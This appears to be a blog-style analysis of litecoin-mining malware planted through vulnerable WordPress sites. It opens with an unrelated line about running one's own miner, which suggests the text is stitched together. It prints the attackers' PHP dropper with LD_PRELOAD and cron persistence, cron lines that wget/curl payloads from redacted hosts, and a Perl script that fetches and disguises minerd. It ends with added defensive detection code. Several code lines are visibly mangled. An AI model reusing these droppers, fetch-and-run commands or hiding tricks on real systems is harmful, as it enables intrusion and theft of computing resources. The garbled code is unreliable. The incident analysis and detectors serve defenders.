litecoin mining in php

I use this script to run litecoin cpuminer. It changes the amount of miner threads depending on whether your PC is idle or not. This enabled me to use the computer normally when needed, but it will start mining when idle.

When an attacker manages to compromise a server or your notebook and get root access, his main goal is usually to steal sensitive information, to use the machine as a bridgehead for attacking other targets, to send spam, or to deny a service in order to cause financial losses.

When I started my sysadmin career path, more than ten years ago, almost all software exploits were used with the goals explained above in mind, but something has been changing since crypto-currencies began to spread and gain real value.

Bitcoin is the most famous crypto-currency nowadays.

Bitcoins can be obtained in exchange for legal currencies (dollar, euro, yen, yuan and so on) or as a reward for payment processing work, in which you offer your computing power to verify and record payments into the public ledger. This activity is called mining and is rewarded by transaction fees and newly created bitcoins. Bitcoin mining requires a huge amount of computation power, so miners usually create computing clusters to generate them.

Mining clusters can be heterogeneous: any kind of digital appliance connected to the Internet is a good candidate for joining the cluster. The more powerful the appliance's CPU (or GPU), the more valuable the appliance itself.

Attackers are starting to make a profit by gaining access to servers, notebooks, smartphones or even simple appliances (smart washing machines, refrigerators, televisions, CCTV security cameras and so on) and stealing CPU/GPU cycles for mining crypto-currencies. Mining bitcoins with a low-end CPU is practically impossible nowadays, but there are other crypto-currencies that are easier to mine than bitcoin.

That's why attackers have been targeting litecoin and dogecoin, which are literally a million times easier to mine. Trend Micro found mining malware in several Android apps, a couple of which were listed in the official Google Play store and had been downloaded by millions of users. Johannes Ullrich realized that there was a network of CCTV security cameras that were being used to mine for dogecoin.

You can usually notice mining malware on a smartphone because of the loss of performance or its "puzzling" overheating, but you may not recognise a similar issue on a modern multicore/multi-socket server. Mining malware tends to keep a low profile; even if it uses 100% of one core of a 12-core CPU, it is only using 8% of the whole CPU power and it may not be noticed.

I found the previously described scenario during two security audits requested by two different clients.
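A miner pinning one core of a 12-core machine shows up as only about 8% on a host-wide graph, which is why per-process accounting matters. The following is an added example, not part of the original article: it compares two snapshots of /proc/<pid>/stat lines and reports processes that saturate a single core. The sample lines are constructed, and CLK_TCK = 100 is an assumption about the host.

```python
# Added example: per-process CPU check from two /proc/<pid>/stat snapshots.
CLK_TCK = 100  # assumption: usual Linux value; read os.sysconf("SC_CLK_TCK") on a live host

def parse_stat(line):
    """Parse one /proc/<pid>/stat line into (pid, comm, cpu_ticks).

    comm is wrapped in parentheses and may itself contain spaces or ')',
    so split on the LAST ') ' instead of on whitespace.
    """
    pid, rest = line.split(" (", 1)
    comm, fields = rest.rsplit(") ", 1)
    f = fields.split()
    # f[0] is the state (field 3); utime and stime are fields 14 and 15
    return int(pid), comm, int(f[11]) + int(f[12])

def core_hogs(before, after, interval_s, ncpu, threshold=0.9):
    """Return [(pid, comm, share_of_one_core, share_of_host)] at or above threshold."""
    start = {pid: ticks for pid, _, ticks in map(parse_stat, before)}
    hogs = []
    for pid, comm, ticks in map(parse_stat, after):
        if pid not in start:
            continue  # process started during the interval, no baseline
        per_core = (ticks - start[pid]) / (interval_s * CLK_TCK)
        if per_core >= threshold:
            hogs.append((pid, comm, round(per_core, 2), round(per_core / ncpu, 3)))
    return hogs

# Constructed snapshots taken 10 seconds apart on a 12-core host.
BEFORE = [
    "4242 (kernelupdates) R 1 4242 4242 0 -1 4194304 500 0 0 0 100000 200 0 0",
    "812 (apache2 (worker)) S 1 812 812 0 -1 4194304 900 0 0 0 5000 1000 0 0",
]
AFTER = [
    "4242 (kernelupdates) R 1 4242 4242 0 -1 4194304 500 0 0 0 100995 205 0 0",
    "812 (apache2 (worker)) S 1 812 812 0 -1 4194304 900 0 0 0 5010 1002 0 0",
]

if __name__ == "__main__":
    for hog in core_hogs(BEFORE, AFTER, interval_s=10, ncpu=12):
        print(hog)
```

The last value in each tuple is what a host-wide dashboard would show for that process; the third is what the process is really doing to one core.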

There were more than 20 servers used for mining litecoins, all hacked using the same technique. All hacked servers hosted vulnerable WordPress platforms, which were used to download and execute the following malicious PHP script.

    header("Content-type: text/plain");
    print "2842123700\n";

    // Polyfill for PHP versions that lack file_put_contents()
    if (!function_exists('file_put_contents')) {
        function file_put_contents($filename, $data) {
            $f = @fopen($filename, 'w');
            if (!$f) return false;
            $bytes = fwrite($f, $data);
            fclose($f);
            return $bytes;
        }
    }

    // Kill any running instance of host
    @system("killall -9 ".basename("/usr/bin/host"));

    $so32 = "...BINARY FILE SOURCE...";

    // Detect a 32-bit PHP build through integer overflow
    $arch = 64;
    if (intval("9223372036854775807") == 2147483647) $arch = 32;
    print "Arch is ".$arch."\n";
    $so = $arch == 32 ? $so32 : $so64;

    // Copy the OS/ABI byte (ELF header offset 7) of /usr/bin/host into the library
    $f = fopen("/usr/bin/host", "rb");
    if ($f) {
        $n = unpack("C*", fread($f, 8));
        $so[7] = sprintf("%c", $n[8]);
        print "System is ".($n[8]

        fclose($f);
    }

    // Write the shared object next to the script
    print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
    if (getenv("MAYHEM_DEBUG")) exit(0);
    $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];

    /* second stage dropper */
    $HBN=basename("/usr/bin/host");
    $SCP=getcwd();
    $SCR ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\n";
    $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
    @file_put_contents("1.sh", $SCR);
    @chmod("1.sh", 0777);

    /* try at now, file will be removed, crontab cleaned on success */
    @/...//.../abc.txt;perl abc.txt;rm -f abc.txt')|crontab", $ret);
    @system("at now -f 1.sh", $ret);
    if ($ret == 0) {
        // 1.sh deletes itself when it runs, so its disappearance means success
        for ($i = 0; $i < 5; $i++) {
            if (!@file_exists("1.sh")) {
                print "AT success\n";
                exit(0);
            }
            sleep(1);
        }
    }

    @/...//.../abc.txt;perl abc.txt;rm -f abc.txt')|crontab", $ret);
    @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
    if ($ret == 0) {
        for ($i = 0; $i < 62; $i++) {
            if (!@file_exists("1.sh")) {
                print "CRONTAB success\n";
                exit(0);
            }
            sleep(1);
        }
    }

    // Last resort: run the second stage directly
    print "Running straight\n";
    @system("./1.sh");

The script contains an ELF malware library inside the $so32 variable (I removed it); it was used to change how /usr/bin/host acts.

    /...//.../abc.txt;perl abc.txt;rm -f abc.txt
    *//...//.../abc.txt;perl abc.txt;rm -f abc*
    *//...//.../abc.txt;perl abc.txt;rm -f abc.txt
    10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://XX.XXX.XXX.XX/.../libcfg.txt;curl -O http://XX.XXX.XXX.XX/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php

Thanks to the first cron task, a remote PERL script was downloaded every 10 seconds.

This is the source code of the last downloaded PERL script:

    #!/usr/bin/perl
    # Kill competing miners and earlier instances
    system("killall -9 minerd");
    system("killall -9 PWNEDa");
    system("killall -9 PWNEDb");
    system("killall -9 PWNEDc");
    system("killall -9 PWNEDd");
    system("killall -9 PWNEDe");
    system("killall -9 PWNEDg");
    system("killall -9 PWNEDm");
    system("killall -9 minerd64");
    system("killall -9 minerd32");
    system("killall -9 named");
    $rn=1;
    $ar=`uname -m`;
    while($rn==1 || $rn==0) {
        $rn=int(rand(11));
    }
    $exists=`ls /tmp/.ice-unix`;
    $cratch=`ps aux | grep -v grep | grep kernelupdates`;
    # Stop here if the renamed miner is already running
    if($cratch=~/kernelupdates/gi) { die; }
    if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
        # Use wget if it is available, otherwise fall back to curl
        $wig=`wget --version | grep GNU`;
        if(length($wig>6)) {
            if($ar=~/64/g) {
                system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://X.XXX.XX.XXX/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
            } else {
                system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://X.XX.XXX.XX/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
            }
        } else {
            if($ar=~/64/g) {
                system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://X.XXX.XX.XXX/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
            } else {
                system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://X.XX.XXX.XXX/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
            }
        }
    }
    @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
    $prt=0;
    while(length($prt)<4) {
        $prt=$prts[int(rand(19))-1];
    }
    print "setup for $rn:$prt done :-)\n";
    :80 -u spdrman.".$rn." -p passxxx &");
    print "done!\n";

The script executes some cleanup tasks, checks the server environment, creates a hidden directory called ".ice-unix" inside the /tmp directory, and then downloads and extracts a tar.gz file that contains the minerd software. The last script command configures and executes the parasite mining software.

The miner joins a mining pool, called "wemineltc", through the stratum protocol, and it uses a random username between "spdrman.0" and "spdrman.11".

The malware tries to camouflage itself by:

By checking the web server logs and the creation dates of several files and directories, I discovered that the parasite mining processes had been running for 3/4 months and no one had noticed it!

You should keep the operating system and all user applications updated, harden your systems and schedule weekly security checks, because checking a global dashboard with overall resource statistics and installing rkhunter or similar tools doesn't guarantee that your servers won't become zombies manipulated by a remote puppet master.
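The indicators described in this write-up (cron jobs that download and run a script, a hidden directory under /tmp, a relative LD_PRELOAD on /usr/bin/host, a stratum pool on the command line) can be turned into a quick triage check. The following is an added example, not code from the original article; the function names, the sample crontab lines, the 192.0.2.10 address and pool.example are constructed for illustration.

```python
import re

# Heuristics for the traits described above (added example, not the author's tooling).
FETCH = re.compile(r"\b(wget|curl)\b[^;|&]*https?://", re.I)
RUN = re.compile(r"\b(perl|php|sh|bash|python)\b\s+\S+|\|\s*(sh|bash|perl)\b", re.I)
WRITABLE = r"/(tmp|var/tmp|dev/shm)/"

def cron_findings(lines):
    """Return (line_no, reason) for cron jobs that fetch-and-run or run from /tmp."""
    out = []
    for n, line in enumerate(lines, 1):
        cmd = line.strip()
        if not cmd or cmd.startswith("#"):
            continue
        if FETCH.search(cmd) and RUN.search(cmd):
            out.append((n, "download-and-execute"))
        elif re.search(r"(^|\s)" + WRITABLE + r"\S+", cmd):
            out.append((n, "runs from world-writable dir"))
    return out

def process_findings(proc):
    """proc: {'exe', 'cmdline', 'environ'} as collected from /proc/<pid>/."""
    hits = []
    exe = proc.get("exe", "")
    if re.match(WRITABLE, exe):
        hits.append("executable in world-writable dir")
    if any(p.startswith(".") for p in exe.split("/")[1:-1]):
        hits.append("executable under hidden directory")
    preload = proc.get("environ", {}).get("LD_PRELOAD", "")
    if preload and not preload.startswith("/"):
        hits.append("relative LD_PRELOAD")
    if any("stratum+tcp://" in arg for arg in proc.get("cmdline", [])):
        hits.append("stratum pool on command line")
    return hits

# Constructed sample data (documentation address, placeholder pool name).
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "*/6 * * * * cd /tmp;wget http://192.0.2.10/abc.txt;perl abc.txt;rm -f abc.txt",
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "10 2 * * * cd /tmp;curl -O http://192.0.2.10/libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php",
    "@reboot /tmp/.ice-unix/kernelupdates",
]
SAMPLE_PROCS = [
    {"exe": "/tmp/.ice-unix/kernelupdates", "cmdline": ["./kernelupdates", "-o", "stratum+tcp://pool.example:80"], "environ": {}},
    {"exe": "/usr/bin/host", "cmdline": ["/usr/bin/host"], "environ": {"LD_PRELOAD": "./libworker.so"}},
    {"exe": "/usr/sbin/apache2", "cmdline": ["/usr/sbin/apache2", "-k", "start"], "environ": {}},
]
```

On a live host, feed cron_findings the output of crontab -l for each account (including the web server user) and build the process records from /proc/<pid>/exe, cmdline and environ.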